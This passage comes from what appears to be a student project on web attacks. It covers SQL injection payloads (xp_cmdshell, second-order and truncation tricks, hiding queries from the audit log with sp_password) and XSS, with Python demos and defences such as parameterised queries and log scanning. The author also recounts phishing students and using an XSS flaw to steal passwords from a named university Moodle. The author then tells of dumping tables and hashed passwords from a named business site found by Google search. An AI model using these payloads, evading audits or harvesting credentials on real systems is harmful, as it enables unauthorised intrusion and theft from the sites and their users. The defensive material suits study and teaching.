objRS.Open strSQL, "DSN=..."
Set objRS = Nothing
%>
it is certainly vulnerable to SQL injection, because if we enter, for example, ' + (SELECT TOP 1 FieldName FROM TableName) + ' in the first field, the query becomes: INSERT INTO TableName VALUES('' + (SELECT TOP 1 FieldName FROM TableName) + '', 'abc', 'def'). Then, when the stored information is displayed, it is as if one more statement had been requested: SELECT TOP 1 FieldName FROM TableName, and its result appears in the first field of the profile.
iiii. Attack using stored procedures
- An attack through stored procedures does very great damage if the application runs with the system administrator account 'sa'.
- For example, if the injected string is: '; EXEC xp_cmdshell 'cmd.exe /c dir C:\' --
- the system will run a directory listing of the C:\ drive on the server.
- What damage is done depends on the command that follows cmd.exe. If SQL Server is installed with default settings it runs under the SYSTEM account, which is equivalent to administrator access in Windows. master..xp_cmdshell can be used to run commands remotely:
; exec master..xp_cmdshell 'ping 10.10.1.2'--
Try double quotes (") if single quotes (') do not work.
Below are some extended stored procedures that hackers often use to run commands that reveal information about the victim machine:
xp_availablemedia: shows the drives present on the machine
xp_dirtree: shows all directories, including subdirectories
xp_loginconfig: retrieves information about the server's security mode
xp_makecab: lets the user create archive files on the server (or of any file the server can access)
xp_ntsec_enumdomains: lists the domains the server can query
xp_terminate_process: terminates a process given its PID
iiiii. Advanced SQL injection attacks
Strings without single quotes:
- Programmers may protect their applications by stripping all quotes, most often by replacing one quote with two.
Example a.1:
function escape( input )
input = replace(input, "'", "''")
escape = input
end function
This blocks the quote-based payloads shown above. However, a string value can be built without any quotes at all by using the char() function, as in the following example.
Example a.2:
INSERT into User VALUES(666, char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), 0xffff)
Example a.2 contains no single quote, yet it still inserts a string into the table; it is equivalent to:
INSERT into User VALUES(666, 'chris', 'chris', 65535)
The hacker can also use numbers as the username and password to avoid quotes, as in the following example.
Example a.3:
INSERT into User VALUES(667, 123, 123, 0xffff)
SQL Server converts the numbers to strings automatically.
Second-order attacks:
- Even though the application escapes single quotes, SQL code can still be injected.
Example b.1: register an account in the application with the following username:
Username: admin'--
Password: passofadmin
- The application doubles the quote, so the resulting INSERT is:
INSERT into User VALUES(123, 'admin''--', 'passofadmin', 0xffff)
(but the database stores the username as admin'--)
- Now suppose the application lets users change their password. The ASP code is written to make sure the user enters the correct old password before setting a new one:
username = escape( Request.form("username") );
oldpassword = escape( Request.form("oldpassword") );
newpassword = escape( Request.form("newpassword") );
var rso = Server.CreateObject("ADODB.Recordset");
var sql = "select * from users where username = '" + username
+ "' and password = '" + oldpassword + "'";
rso.open( sql, cn );
if (rso.EOF)
{
// wrong old password: handling not shown
}
- The query that sets the new password is:
sql = "update users set password = '" + newpassword + "' where username = '" + rso("username") + "'";
rso("username") is the username returned by the login query, which is admin'--, taken from the database and not escaped again. The query therefore becomes:
update users set password = 'password' where username = 'admin'--'
- In this way the hacker changes the admin's password to a value of his own choosing. This situation still exists in most large applications today that rely on an escaping mechanism. The best solution is to reject such values rather than to escape them. The difficulty is that some inputs (names, for instance) must allow these characters, e.g. O'Brien.
- The best way to deal with this is not to accept single quotes at all. If that is not possible, strip or replace them as above. In that case, the best approach is to make sure that every value placed into an SQL query, including values read back from the database, is strictly controlled.
Some applications try to prevent users from appending to the query by limiting the length of the input. The limit does stop some attacks, but it still leaves the hacker an opening.
Example b.2:
Suppose both the username and the password are limited to at most 16 characters. Enter:
Username: aaaaaaaaaaaaaaa'
Password: '; shutdown--
The application replaces each single quote with two, but because the string is then cut to 16 characters the added quote is dropped from the username. The SQL statement becomes:
select * from users where username='aaaaaaaaaaaaaaa'' and password='''; shutdown--'
so the username in the statement is the value:
aaaaaaaaaaaaaaa' and password='
after which ; shutdown-- runs as a separate statement.
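As an added example (not code from the e-book), the following Python reproduces both of the "escaping is not enough" cases above against SQLite: the second-order attack of example b.1, in which a registered username admin'-- is read back from the table and concatenated into the UPDATE, and the truncation of example b.2, in which escaping followed by a 16-character cut leaves a dangling quote. The users table and its rows are constructed; the shutdown statement is only built as text, not executed.

```python
import sqlite3


def escape(value):
    """The quote-doubling filter of example a.1, as used by the change-password code."""
    return value.replace("'", "''")


def setup_db():
    """Constructed users table with one administrator (sample data, not the e-book's)."""
    cn = sqlite3.connect(":memory:")
    cn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT, priv INTEGER)")
    cn.execute("INSERT INTO users VALUES (1, 'admin', 'passofadmin', 65535)")
    return cn


def register(cn, uid, username, password):
    """Registration escapes both fields, so this INSERT is not injectable,
    but it faithfully stores the username admin'-- when that is what was entered."""
    cn.execute("INSERT INTO users VALUES (%d, '%s', '%s', 0)"
               % (uid, escape(username), escape(password)))


def password_of(cn, username):
    row = cn.execute("SELECT password FROM users WHERE username = ?", (username,)).fetchone()
    return row[0] if row else None


def change_password_vulnerable(cn, username, oldpassword, newpassword):
    """Mirrors the JScript: the form input is escaped, but the username read back
    from the database is trusted and concatenated into the UPDATE."""
    row = cn.execute("SELECT username FROM users WHERE username = '%s' AND password = '%s'"
                     % (escape(username), escape(oldpassword))).fetchone()
    if row is None:
        return False
    stored_name = row[0]            # "admin'--" straight from the table, never escaped
    cn.execute("UPDATE users SET password = '%s' WHERE username = '%s'"
               % (escape(newpassword), stored_name))
    return True


def change_password_safe(cn, username, oldpassword, newpassword):
    """Bound parameters throughout, including for the value that came from the database."""
    row = cn.execute("SELECT username FROM users WHERE username = ? AND password = ?",
                     (username, oldpassword)).fetchone()
    if row is None:
        return False
    cn.execute("UPDATE users SET password = ? WHERE username = ?", (newpassword, row[0]))
    return True


def build_login_query(username, password, maxlen=16):
    """Example b.2: escaping followed by truncation to the column length can cut off
    the doubled quote, leaving an unbalanced quote in the statement."""
    u = escape(username)[:maxlen]
    p = escape(password)[:maxlen]
    return "SELECT * FROM users WHERE username='%s' AND password='%s'" % (u, p)


if __name__ == "__main__":
    cn = setup_db()
    register(cn, 2, "admin'--", "x")
    change_password_vulnerable(cn, "admin'--", "x", "owned")
    print(password_of(cn, "admin"))                                   # owned
    print(build_login_query("aaaaaaaaaaaaaaa'", "'; shutdown--"))
```

The vulnerable UPDATE ends up as UPDATE users SET password = 'owned' WHERE username = 'admin'--' and changes the real administrator's password; the parameterised version changes only the password of the account literally named admin'--. The built login query ends in password='''; shutdown--', which is exactly the statement shown in the text.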
iiiii.3. Evading the audit:
- SQL Server has a thorough auditing mechanism in the sp_trace* family of procedures, which records many kinds of event in the database, in particular T-SQL events, so that every SQL statement executed on the server is logged. If auditing is enabled, every one of the hacker's queries is recorded, and an administrator can see what is going on and quickly find a response. There is a way to counter this: add the string sp_password to the T-SQL statement, because when the trace encounters it the audit record is replaced with:
-- 'sp_password' was found in the text of this event.
-- The text has been replaced with this comment for security reasons.
and this happens even when sp_password appears inside a comment. So, to hide all of the attack queries, it is enough to append sp_password after the -- as follows:
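Since the database audit can be blinded this way, a second record that the attacker cannot edit, the web server's access log, is where these requests should be looked for. As an added example (not code from the e-book), the following Python scans access-log lines for the payload shapes discussed in this chapter, including sp_password appearing behind a comment marker. The log lines, the request paths and the scoring are constructed for the example.

```python
import re
from urllib.parse import unquote_plus, urlsplit

REQUEST_RE = re.compile(r'"(?:GET|POST)\s+(\S+)\s+HTTP/')

# Indicators drawn from the payloads discussed in this chapter.
SIGNATURES = {
    "quote":         re.compile(r"'"),
    "comment":       re.compile(r"--"),
    "tautology":     re.compile(r"\bor\b\s*\S+\s*=\s*\S+", re.I),           # OR 1=1, OR ''=''
    "union_select":  re.compile(r"\bunion\b.*\bselect\b", re.I),
    "xp_cmdshell":   re.compile(r"xp_cmdshell", re.I),
    "char_encoding": re.compile(r"\bchar\s*\(\s*0x[0-9a-f]+", re.I),       # quote-free strings
    "audit_evasion": re.compile(r"--.*sp_password", re.I),                 # sp_password behind a comment
}
HIGH = {"tautology", "union_select", "xp_cmdshell", "char_encoding", "audit_evasion"}


def decoded_query(log_line):
    """Return the URL-decoded query string of the request, or None if the line holds no request."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return None
    return unquote_plus(urlsplit(m.group(1)).query)


def indicators(text):
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(text))


def severity(hits):
    """A lone quote or -- is weak evidence (O'Brien is a real name); the others are not."""
    if not hits:
        return "none"
    return "high" if HIGH & set(hits) else "low"


def scan_log(lines):
    """Return (line_number, severity, hits) for every request line carrying an indicator."""
    findings = []
    for n, line in enumerate(lines, 1):
        q = decoded_query(line)
        if q is None:
            continue
        hits = indicators(q)
        if hits:
            findings.append((n, severity(hits), hits))
    return findings


# Constructed access-log lines in the common Apache format.
SAMPLE_LOG = [
    '192.0.2.1 - - [10/Oct/2010:13:55:36 +0700] "GET /product.asp?ID=123 HTTP/1.1" 200 2326',
    '192.0.2.1 - - [10/Oct/2010:13:55:40 +0700] "GET /product.asp?ID=0%20or%201=1 HTTP/1.1" 200 18831',
    '192.0.2.1 - - [10/Oct/2010:13:56:02 +0700] "GET /search.asp?fAUTHOR_NAME=%27+UNION+ALL+SELECT+name+FROM+sysobjects+WHERE+xtype%3D%27U%27-- HTTP/1.1" 200 4102',
    '192.0.2.1 - - [10/Oct/2010:13:57:15 +0700] "GET /search.asp?fAUTHOR_NAME=%27%3B+EXEC+master..xp_cmdshell+%27dir+C%3A%27--+sp_password HTTP/1.1" 500 512',
    '198.51.100.4 - - [10/Oct/2010:14:01:09 +0700] "GET /search.asp?fAUTHOR_NAME=O%27Brien HTTP/1.1" 200 860',
]

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

Decoding before matching matters: the payloads arrive percent-encoded, and a rule applied to the raw line would miss %27 and %3B. POST bodies are not in the access log at all, which is why this check complements rather than replaces validation in the application.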
2.3.2. Preventing SQL injection
- As we have seen, SQL injection exploits carelessness on the part of web developers when they handle the input used to build SQL statements. The damage depends on the environment and on how the system is configured. If the application runs with dbo rights (the database owner), it can delete all of the tables, create new ones, and so on. If the application runs with sa rights (the system administrator), it can control the whole database management system, and with rights that broad it can create unauthorised user accounts to take control of your system.
In most browsers, these characters should be encoded in the URL before they are used.
Because SQL injection relies on error messages, one valuable countermeasure is to stop showing error messages to the user, replacing them with a page designed by the developer whenever the application hits an error. Note that this removes a source of information but does not close the hole: the injected query still executes, only blindly. The statement itself must be built safely, with bound parameters, and input validation added as a second layer.
Check the user's input carefully and replace characters such as ; and the like. Remove meta characters such as ' " / \ ; and extended characters such as NULL, CR, LF from every string received from:
o data entered by the user
o parameters in the URL
o values from cookies
For numeric values, convert them to integers before executing the SQL query, or use ISNUMERIC to make sure the value is an integer (an explicit conversion is the safer of the two, since ISNUMERIC also accepts currency and exponent notations).
Encrypt sensitive data stored in the database.
i. Validating data
- Validating data properly is a complex problem, and one that applications often do not take seriously enough. The point of validation is not merely to bolt a few functions onto the application, but to check input in a general, consistent way that actually achieves the goal.
- The following summary discusses data validation, with sample code to illustrate it.
There are three approaches to the problem:
1) Try to check and correct the data so that it becomes valid.
2) Reject invalid data.
3) Accept only valid data.
Approach 1 is hard to carry out:
- First, the programmer cannot know every form of invalid data, because invalid data is extremely varied.
- Second, there is the problem of second-order SQL injection when data is read back out of the system.
Approach 2 fails in the same situations as approach 1, because:
- invalid data keeps changing as new kinds of attack are developed.
Approach 3 is better than the other two, but runs into some limitations in practice.
- The best protection combines approaches 2 and 3. One example of why the combination is needed: the hyphen in the double-barrelled surname Quentin Bassington-Bassington must be allowed by the definition of valid data, yet the sequence -- has a special meaning in SQL Server.
- For example, suppose there is a filter that:
+ strips known-bad data such as --, select and union, and
+ a control function that strips single quotes.
An attacker will still send probes of the form: union select @@version-- and adjust them until the string matching no longer catches them.
Some basic ways to implement data validation
Method 1: Reject invalid data
function validate_string( input )
known_bad = array("select", "insert", "update", "delete", "drop", "--", "'")
validate_string = true
for i = lbound( known_bad ) to ubound( known_bad )
if ( instr( 1, input, known_bad(i), vbtextcompare ) <> 0 ) then
validate_string = false
exit function
end if
next
end function
Method 2: Replace single quotes
function escape( input )
input = replace(input, "'", "''")
escape = input
end function
Method 3: Accept only valid data
function validatepassword( input )
good_password_chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
validatepassword = true
for i = 1 to len( input )
c = mid( input, i, 1 )
if ( InStr( good_password_chars, c ) = 0 ) then
validatepassword = false
exit function
end if
next
end function
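As an added example (not code from the e-book), the following Python shows the deny-list (method 1) and the allow-list (method 3) side by side, extends the allow-list to the name case discussed above, where O'Brien and Bassington-Bassington must pass but -- must not, and adds the integer conversion recommended for numeric parameters. The character classes and length limit are assumptions for the example.

```python
import re

KNOWN_BAD = ("select", "insert", "update", "delete", "drop", "--", "'")


def reject_known_bad(value):
    """Method 1, a deny-list like validate_string(): case-insensitive substring match."""
    lowered = value.lower()
    return not any(bad in lowered for bad in KNOWN_BAD)


def validate_password(value):
    """Method 3, an allow-list like validatepassword(): only letters and digits."""
    return re.fullmatch(r"[A-Za-z0-9]+", value) is not None


def validate_person_name(value):
    """Allow-list for names that must admit O'Brien and Bassington-Bassington:
    letters, spaces, apostrophes and hyphens, but never the SQL comment sequence --
    (the combination of approaches 2 and 3 recommended in the text)."""
    if not 1 <= len(value) <= 64 or "--" in value:
        return False
    return re.fullmatch(r"[A-Za-z][A-Za-z' \-]*", value) is not None


def parse_numeric_id(value):
    """For numeric parameters: convert to int before the query. Anything that is not
    a plain integer, including '0 OR 1=1' and '1e3', is rejected with None."""
    try:
        return int(value.strip())
    except ValueError:
        return None


if __name__ == "__main__":
    for name in ("O'Brien", "Quentin Bassington-Bassington", "admin'--", "dropbox user"):
        print("%-32s deny-list: %-5s  allow-list: %s"
              % (name, reject_known_bad(name), validate_person_name(name)))
```

The last sample shows the weakness of a deny-list from the other side: "dropbox user" is rejected because it contains the substring drop, while the allow-list accepts it. Even the allow-list only reduces what reaches the query; the value must still be passed as a bound parameter.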

ii. SQL Server Lockdown

This is a checklist of tasks for protecting a SQL Server:
- Determine how the server can be connected to:
  o Use the Network Utility to check that only the network libraries actually in use are enabled.
- Review all accounts that exist in SQL Server:
  o Create low-privilege accounts for applications.
  o Remove accounts that are not needed.
  o Make sure every account has a valid (non-blank, strong) password.
- Review the objects that exist:
  o Many extended stored procedures can be removed safely. If this is done, also consider removing the .dll files that contain the code of those extended stored procedures.
  o Remove all sample databases such as northwind and pubs.
  o Remove unused stored procedures such as master..xp_cmdshell, xp_startmail, xp_sendmail and sp_makewebtask.
- Check which accounts can access which objects:
  o An application account used to access the database should be granted only the minimum rights it needs on the objects it actually uses.
- Check the server's patch level:
  o Attacks such as buffer overflows and format string bugs typically target this layer, i.e. known but unpatched flaws in the server itself.
- Review the sessions open on the server.
- Change the account that SQL Server starts up and runs under to a low-privilege user, in SQL Server Security.
- Remarks:
+ From the study of SQL Injection it is clear that checking data before processing it is necessary.
+ Besides validating its data, the application should also encrypt sensitive data inside the database itself (for passwords, a hash rather than reversible encryption), and must not output error pages that report SQL syntax errors, so that an attacker cannot gather information about the database from them.
- In parallel, this is the network administrator's job.
iii. Configuring the database management system securely
- There must be strict controls that limit the data-processing rights of the user account the web application uses. Ordinary applications should avoid accounts with roles such as dbo or sa: the more restricted the rights, the smaller the damage. In addition, to reduce the risk of a SQL Injection attack, remove any technical information from the messages returned to the user when the application fails. Ordinary error messages often disclose technical details that let an attacker learn the system's weaknesses.
2.4. Cross Site Scripting (XSS)
2.4.1. XSS attacks
- Cross-Site Scripting (XSS) is one of the most common attack techniques today, and it is also one of the most important security problems for web developers and web users alike. Any website that lets users post content without strictly checking it for dangerous code may contain an XSS flaw.
- Cross-Site Scripting, abbreviated XSS (rather than CSS, to avoid confusion with HTML's Cascading Style Sheets), is an attack technique that injects HTML tags or dangerous script into dynamic websites (ASP, PHP, CGI, JSP, ...) in order to harm other users of the site. The injected code is mostly written in client-side script such as JavaScript, JScript or DHTML, and may also consist of plain HTML tags. XSS quickly became one of the most common flaws in web applications and its threat to users keeps growing; the winner of the eWeek OpenHack 2002 contest was the person who found 2 new XSS flaws, a sign that the danger of XSS is drawing more and more attention.
2.4.1.1. How XSS works:
- Fundamentally, XSS, like SQL Injection or Source Injection, consists of requests sent from the client to the server that inject data the server does not control. The request may come from a form submission or simply from a URL such as

http://www.example.com/search.cgi?query=<script>alert('XSS was found !');</script>

- and your browser will very likely pop up the message "XSS was found !". The code inside the script tag is not limited in any way: it can be replaced by a source file hosted on another server through the src attribute of the script tag. This is why the danger of XSS flaws cannot be fully measured in advance.
- Where other attack techniques can change the web server's source data (source code, structure, database), XSS only damages the client side of the website, and the direct victims are the visitors browsing it. Attackers do sometimes use this technique to deface websites, but that still only hits the surface of the site. XSS payloads are client-side scripts that run only in the victim's browser, so the site on the server is not itself modified (the payload can, however, perform any action the victim's session is allowed to, which matters when the victim is an administrator). The real targets of XSS are the website's other users: when they unknowingly open a page containing the attacker's code, they may be redirected to other sites, have their homepage changed, or worse, lose passwords and cookies, and their machine may even be infected with viruses, backdoors or worms.
2.4.1.2. Carrying out an attack
i. Scanning a web application for XSS flaws
- Method 1: Use a web application vulnerability scanner, for example Web Vulnerability Scanner, to scan for XSS flaws.
- Method 2: Follow 5 steps:
Step 1: Open the website to be tested.
Step 2: Identify the places (parts) to test for XSS. Any site has parts such as search boxes, error messages and web forms. XSS flaws mostly live there; in general XSS can occur anywhere the user can enter data and then get something back. As a test value, enter the string XSS.
Step 3: Judge whether the site is likely to have an XSS flaw from the information returned. If you see something like "XSS not found", "Account XSS is incorrect" or "Login as XSS failed", i.e. the input is echoed back, the chance that this spot has an XSS flaw is very high.
Step 4: Once a spot looks vulnerable, insert your own code there to try it, for example:
Insert this code: <script>alert('XSS')</script> into the vulnerable field and press Login; if a popup with the word XSS appears, the spot is 100% vulnerable to XSS.
Note, however, that occasionally a website is vulnerable but no popup appears; you then have to view the page source and look for the line <script>alert('XSS')</script>. If it is there unchanged, congratulations, you have found XSS.
Suppose http://doannguyennganh.com/index.php is a site with an XSS flaw and the vulnerable spot is found to be http://doannguyennganh.com/index.php?page=<script...</script>; this means the code can be injected right from the address bar.
Step 5: Plan the attack scenario.
ii. Attacking
- There are really many attack techniques built on XSS flaws; mainly, once you know how to find the hole, everyone has their own recipe for the attack. Here I would like to describe a technique that I carried out successfully on the moodle site of the Faculty of Information Technology, KHTN: stealing passwords.
- After verifying for certain that the moodle site had an XSS flaw at the login spot,
- I immediately wrote a small application and uploaded it to a free host; its task is to receive the student ID (MSSV) and password sent to it and write them to a txt file. How it receives them is explained below. Then:
Step 1: I created a fake e-mail saying: "Intel recruitment forum, anyone interested please take part", with a fake link http://doannguyennganhgia.com/index.php that actually referred to a fake page of mine. In an instant, that page attaches a script whose task is to take the username and password after login and inject it into the real page (because the real page has an XSS flaw, it lets us attach malicious code; "attach" here means that when we view the source of the page we can see our script somewhere in it), then redirects to the real page immediately so as not to arouse suspicion.
Step 2: The user opens the mail, believes it is real, clicks the link and sees that it goes to the moodle page (they are unaware that the real page has had malicious code attached; it happens so quickly that they suspect nothing, although an observant user would notice that the link is wrong).
Step 3: They log in; the application is then interpreted from top to bottom and naturally also runs the script we planted, at which point the MSSV and password are captured and sent to a page on the server we set up.
Step 4: Our server application receives the MSSV and password and writes them to the txt file.
Step 5: The attack is finished; we have a list of student accounts.
2.4.2. Prevention
- As mentioned above, an XSS attack only succeeds when a web page is delivered to the victim's browser together with the attacker's malicious script. Web developers can therefore protect their sites from being abused by XSS attacks by making sure the dynamically generated pages contain no script tags, either by filtering and validating all input from the user or by encoding and filtering the values output to the user.
2.4.2.1. Filtering
- Always filter data entered by the user by removing the meta-characters (special characters) defined in the HTML specification. Every input field, including link parameters, must be checked for script tags.
2.4.2.2. Encoding
- An XSS flaw can be avoided when the web server ensures the generated pages are properly encoded, which prevents unwanted scripts from running.
- Server-side encoding is a process in which all dynamically generated content passes through an encoding function, where script tags (and the characters that form them, such as < and >) are replaced by their encoded equivalents.
- In general, encoding is the recommended approach because it does not require you to decide which characters are valid and which are not. However, encoding all untrusted data can cost resources and affect the performance of some servers.
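The reflected-XSS check of section 2.4.1.2 (does the probe come back unchanged?) and the two defences of this section are shown together below, as an added example that is not part of the e-book. The search endpoint mirrors the `search.cgi?query=...` URL of section 2.4.1.1; the page templates, the probes and the blacklist filter are constructed for the demonstration. The example goes slightly beyond the text in one respect: it adds a second probe with no `<script>` tag at all, to show why a filter that only strips script tags (2.4.2.1) is weaker than encoding every untrusted character on output (2.4.2.2).

```python
# Added example (not from the e-book): a reflected-XSS check for a search
# endpoint like http://www.example.com/search.cgi?query=..., and the two
# defences of section 2.4.2 (filtering vs. output encoding) side by side.
# The page templates and probes below are constructed for this demonstration.
import html
import re

SCRIPT_PROBE = "<script>alert('XSS')</script>"
# A second probe that carries no <script> tag at all: an event handler on an <img>.
IMG_PROBE = "<img src=x onerror=alert('XSS')>"


def render_vulnerable(query: str) -> str:
    """Echoes the search term straight into the HTML (the bug)."""
    return f"<p>Results for: {query}</p>"


def strip_script_tags(value: str) -> str:
    """Section 2.4.2.1 style blacklist filter: drop <script> tags only."""
    return re.sub(r"(?is)</?script[^>]*>", "", value)


def render_filtered(query: str) -> str:
    """Blacklist filtering applied; still unsafe against tag/attribute variants."""
    return f"<p>Results for: {strip_script_tags(query)}</p>"


def render_encoded(query: str) -> str:
    """Section 2.4.2.2: HTML-encode all untrusted output (<, >, &, quotes)."""
    return f"<p>Results for: {html.escape(query, quote=True)}</p>"


def reflected_unencoded(response_html: str, probe: str) -> bool:
    """Steps 3 and 4 of the scan: does the probe come back byte-for-byte, not encoded?"""
    return probe in response_html


def scan(render, probes=(SCRIPT_PROBE, IMG_PROBE)) -> dict:
    """Run every probe through a page renderer and report which ones reflect raw."""
    return {p: reflected_unencoded(render(p), p) for p in probes}


if __name__ == "__main__":
    for name, fn in (("vulnerable", render_vulnerable),
                     ("filtered", render_filtered),
                     ("encoded", render_encoded)):
        print(name, scan(fn))
    print(render_encoded(SCRIPT_PROBE))
```

The scan reports both probes reflected by the vulnerable page, only the `<img>` probe reflected by the filtered page, and nothing reflected by the encoded page. `html.escape(..., quote=True)` also encodes `"` and `'`, so the same function is safe for a value placed inside a quoted HTML attribute; a value placed inside a script block or a URL needs the encoding of that context instead.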

CHAPTER 3
DEMO, EVALUATION AND FUTURE DIRECTIONS
3.1. Demo
- First, a small Google search trick is used to find sites vulnerable to SQL Injection. Here I used the keyword pattern inurl:keywords
For example: inurl:sanpham.php?id=3
- Using that keyword on google.com I picked a simply designed website, http://nhanquynhphat.com/sanpham.php?id=3; I guessed it was vulnerable to SQL Injection and proceeded to exploit the flaw.
- I tested it and found that the website was indeed vulnerable to SQL Injection, so I went on to collect information about the site such as the MySQL version so that the exploitation would be clearer. The website uses MySQL version >= 5, so I could easily exploit it through information_schema.tables without having to guess its table names.

Figure 13. The table information obtained.

- Ignoring the unrelated tables, the tables obtained are: khuyenmai, lienhe, loaispcon, online, sanpham, tbl_gioithieu, tbl_lienhe, tbl_lienket, tbl_tintuc, thanhtoan, tintuc, user
- Then I retrieved the column and data information; the result is shown in figure 14.

Figure 14. The extracted data is in encoded form.

- As figure 14 shows, the data obtained is in encoded form. The SQL Injection exploit now needs one more step: find the administrator login path and, if the password is stored in encoded (hashed) form, crack it.
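The steps of the demo, reproduced offline as an added example that is not part of the e-book: a boolean test of the `id` parameter, a version probe, enumeration of table names from the database catalog, and a dump of the `user` table through the same UNION, followed by the parameterised version of the page that closes the hole. The in-memory SQLite database, the `sanpham` and `user` tables, their rows and the MD5-hashed password are constructed for the demonstration, and SQLite's `sqlite_master` stands in for MySQL's `information_schema.tables` (on MySQL the version probe would use `@@version` rather than `sqlite_version()`).

```python
# Added example (not from the e-book): the UNION-based enumeration of section 3.1
# reproduced offline against an in-memory SQLite database. SQLite's sqlite_master
# catalog stands in for MySQL's information_schema.tables; the product/user
# tables, values and the endpoint name are constructed for this demonstration.
import hashlib
import sqlite3


def make_site_db() -> sqlite3.Connection:
    """Constructed schema resembling the demo site: a products table and a user table."""
    con = sqlite3.connect(":memory:")
    con.executescript(
        """
        CREATE TABLE sanpham (id INTEGER PRIMARY KEY, ten TEXT, gia TEXT);
        CREATE TABLE user (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO sanpham VALUES (3, 'Ban go', '1200000');
        """
    )
    # Password stored as an unsalted MD5 hash, the "encoded" form seen in figure 14.
    con.execute("INSERT INTO user VALUES (1, 'admin', ?)",
                (hashlib.md5(b"password").hexdigest(),))
    return con


def product_page_vulnerable(con, id_param: str):
    """Equivalent of sanpham.php?id=...: the parameter is pasted into the query."""
    sql = f"SELECT ten, gia FROM sanpham WHERE id = {id_param}"
    return con.execute(sql).fetchall()


def product_page_safe(con, id_param: str):
    """The fix: reject anything that is not an integer, then bind the value."""
    if not id_param.isdigit():
        return []
    return con.execute("SELECT ten, gia FROM sanpham WHERE id = ?",
                       (int(id_param),)).fetchall()


# --- the attacker's steps; each string is a value for the id parameter ---
def is_injectable(page) -> bool:
    """Boolean test: 'id=3 AND 1=1' returns the product, 'id=3 AND 1=2' does not."""
    return bool(page("3 AND 1=1")) and not page("3 AND 1=2")


def db_version(page) -> str:
    """UNION-based version probe (sqlite_version() here; @@version on MySQL)."""
    rows = page("-1 UNION SELECT sqlite_version(), ''")
    return rows[0][0] if rows else ""


def enumerate_tables(page):
    """Read table names from the catalog, as the demo did via information_schema.tables."""
    rows = page("-1 UNION SELECT name, '' FROM sqlite_master WHERE type='table'")
    return sorted(r[0] for r in rows)


def dump_users(page):
    """Once the 'user' table is known, pull its columns through the same hole."""
    return page("-1 UNION SELECT username, password FROM user")


if __name__ == "__main__":
    con = make_site_db()
    vuln = lambda p: product_page_vulnerable(con, p)
    safe = lambda p: product_page_safe(con, p)
    print("injectable:", is_injectable(vuln), "/ after fix:", is_injectable(safe))
    print("version:", db_version(vuln))
    print("tables:", enumerate_tables(vuln))
    print("users:", dump_users(vuln))
    print("after fix:", enumerate_tables(safe), dump_users(safe))
```

The `-1` in each payload makes the original `WHERE id = -1` match nothing, so the page shows only the rows the attacker's `SELECT` appended; the number of columns in the appended `SELECT` has to equal the number in the original query (two here), which is why the version and table-name probes pad with an empty string. Against the parameterised page every payload is rejected before reaching the database.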
3.2. Conclusion
3.2.1. Results achieved
- Measured against the requirements set out at the start, the project has so far achieved the following:
Studied the following web application attack techniques:
o Client-side code injection: Cross-site Scripting.
o SQL query injection and advanced SQL Injection attacks.
o Local Attack.
o Denial of Service.
Security measures that combine the efforts of the network administrator, the web application designer and the user:
o Testing whether a web page can be attacked by SQL injection or parameter tampering.
o Being able to defend against the common attacks of today, as studied above.

3.2.2. Limitations
While working on this project I searched many documents which, although they share the same goal, use completely different methods. I tried to learn more about them but could not avoid a number of mistakes.
3.2.3. Future directions
Within the scope of a specialised project, the requirements set out have been met. I would like to propose the following directions for extending the project and will try to develop them further:
Study more attack techniques in order to propose deeper security methods for web applications.
Study security in more depth, not only at the level of a single web application but extending to the security of network systems and services.
Build a better vulnerability detection program covering more technical aspects.

